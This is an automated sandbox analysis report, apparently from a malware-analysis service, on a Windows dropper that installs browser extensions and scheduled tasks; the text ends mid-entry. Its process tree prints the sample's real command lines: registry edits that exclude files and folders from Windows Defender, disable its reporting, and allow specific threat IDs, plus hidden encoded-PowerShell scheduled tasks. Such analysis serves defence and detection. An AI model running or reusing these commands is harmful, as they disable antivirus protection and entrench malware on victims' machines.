Analysis
max time kernel: 120s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 26-09-2022 03:03

Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20220812-en

General
Target: file.exe
Size: 7.2MB
MD5: 20704fc92ed49100e2963e7690e4cc95
SHA1: d9d9c124c95fbc4749ef8ab8b2eb8c7acd329cdf
SHA256: a07f93b63123cdf3cbcb146daf61069b7137e1a297346fb2f4c5fdcd30d4acaf
SHA512: a0b2e238542707df3aaa6e379eb75ed318fd0fa5c8aca67e89325973c9e991b5da44d098cfca71cf0f27262dffcdd28eb0c0c90d34be58d91e761a959358f230
SSDEEP: 196608:91OC2MisUkla+i6k9OP8EeQDPesNZZY9X:3Or1Hkla+MOEJsnCB
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
flow | pid | process
64 | 1576 | rundll32.exe
65 | 1576 | rundll32.exe
67 | 1576 | rundll32.exe
-
Executes dropped EXE 4 IoCs
Processes:
pid | process
4380 | Install.exe
4840 | Install.exe
3256 | cjUBQYS.exe
740 | tawQnMM.exe
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | Install.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | tawQnMM.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid | process
1576 | rundll32.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | tawQnMM.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json | tawQnMM.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\goiejopegncpjmocklmfiipofdbkhpic\1.0.0.0\manifest.json | tawQnMM.exe
-
Drops desktop.ini file(s) 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | tawQnMM.exe
-
Drops file in System32 directory 31 IoCs
-
Drops file in Program Files directory 14 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | tawQnMM.exe
File created | C:\Program Files (x86)\jFRyDUODU\YOItBGr.xml | tawQnMM.exe
File created | C:\Program Files (x86)\oCfcnVibUgRU2\ioQojJk.xml | tawQnMM.exe
File created | C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\qkmUJcE.xml | tawQnMM.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | tawQnMM.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | tawQnMM.exe
File created | C:\Program Files (x86)\oCfcnVibUgRU2\hPPHdEkrAXiKi.dll | tawQnMM.exe
File created | C:\Program Files (x86)\SfrSbxhXbhVCC\PtmRoJF.dll | tawQnMM.exe
File created | C:\Program Files (x86)\dWSjIMqfbdUn\WgVWOaY.dll | tawQnMM.exe
File created | C:\Program Files (x86)\jFRyDUODU\PHErXK.dll | tawQnMM.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | tawQnMM.exe
File created | C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\YerEkbo.dll | tawQnMM.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | tawQnMM.exe
File created | C:\Program Files (x86)\SfrSbxhXbhVCC\fkEKoFh.xml | tawQnMM.exe
-
Drops file in Windows directory 4 IoCs
Processes:
description | ioc | process
File created | C:\Windows\Tasks\kYTQWNyBMOqWrvtpH.job | schtasks.exe
File created | C:\Windows\Tasks\bNpHvRwEXzIclVjPnA.job | schtasks.exe
File created | C:\Windows\Tasks\ZfXrITCAwqWWdJVle.job | schtasks.exe
File created | C:\Windows\Tasks\bcMXixuPVnLBvIi.job | schtasks.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
3368 | schtasks.exe
3244 | schtasks.exe
1692 | schtasks.exe
2448 | schtasks.exe
4240 | schtasks.exe
1920 | schtasks.exe
4916 | schtasks.exe
4000 | schtasks.exe
3012 | schtasks.exe
4988 | schtasks.exe
1448 | schtasks.exe
-
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 40 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 3012 | powershell.EXE
Token: SeDebugPrivilege | 4908 | powershell.exe
Token: SeDebugPrivilege | 4664 | powershell.exe
Token: SeDebugPrivilege | 2236 | powershell.EXE
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe (depth 1)
Command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSD91F.tmp\Install.exe (depth 2)
Command line: .\Install.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSDDB3.tmp\Install.exe (depth 3)
Command line: .\Install.exe /S /site_id "525403"
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe (depth 4)
Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe (depth 5)
Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exe (depth 6)
Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
-
\??\c:\windows\SysWOW64\reg.exe (depth 6)
Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
-
C:\Windows\SysWOW64\forfiles.exe (depth 4)
Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe (depth 5)
Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exe (depth 6)
Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
-
\??\c:\windows\SysWOW64\reg.exe (depth 6)
Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\schtasks.exe (depth 4)
Command line: schtasks /CREATE /TN "gQXaASGyz" /SC once /ST 00:55:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
(The -EncodedCommand value is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe (depth 4)
Command line: schtasks /run /I /tn "gQXaASGyz"
-
C:\Windows\SysWOW64\schtasks.exe (depth 4)
Command line: schtasks /DELETE /F /TN "gQXaASGyz"
-
C:\Windows\SysWOW64\schtasks.exe (depth 4)
Command line: schtasks /CREATE /TN "bNpHvRwEXzIclVjPnA" /SC once /ST 05:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\dMUiSaChFqmKilH\cjUBQYS.exe\" hV /site_id 525403 /S" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (depth 1)
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
(Same encoded command as the "gQXaASGyz" task; it decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe (depth 2)
Command line: "C:\Windows\system32\gpupdate.exe" /force
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
-
C:\Windows\system32\gpscript.exe (depth 1)
Command line: gpscript.exe /RefreshSystemParam
-
C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\dMUiSaChFqmKilH\cjUBQYS.exe (depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\dMUiSaChFqmKilH\cjUBQYS.exe hV /site_id 525403 /S
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
Command line: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe [depth 3]
  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exe [depth 4]
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [depth 2]
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SfrSbxhXbhVCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SfrSbxhXbhVCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dWSjIMqfbdUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dWSjIMqfbdUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jFRyDUODU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jFRyDUODU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oCfcnVibUgRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oCfcnVibUgRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wMiAwpnFkXrivKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wMiAwpnFkXrivKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lhYCvcGAfKQiHdyz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lhYCvcGAfKQiHdyz\" /t REG_DWORD /d 0 /reg:64;"
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe [depth 3]
  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SfrSbxhXbhVCC" /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 4]
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SfrSbxhXbhVCC" /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SfrSbxhXbhVCC" /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dWSjIMqfbdUn" /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dWSjIMqfbdUn" /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jFRyDUODU" /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jFRyDUODU" /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR" /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR" /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oCfcnVibUgRU2" /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oCfcnVibUgRU2" /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
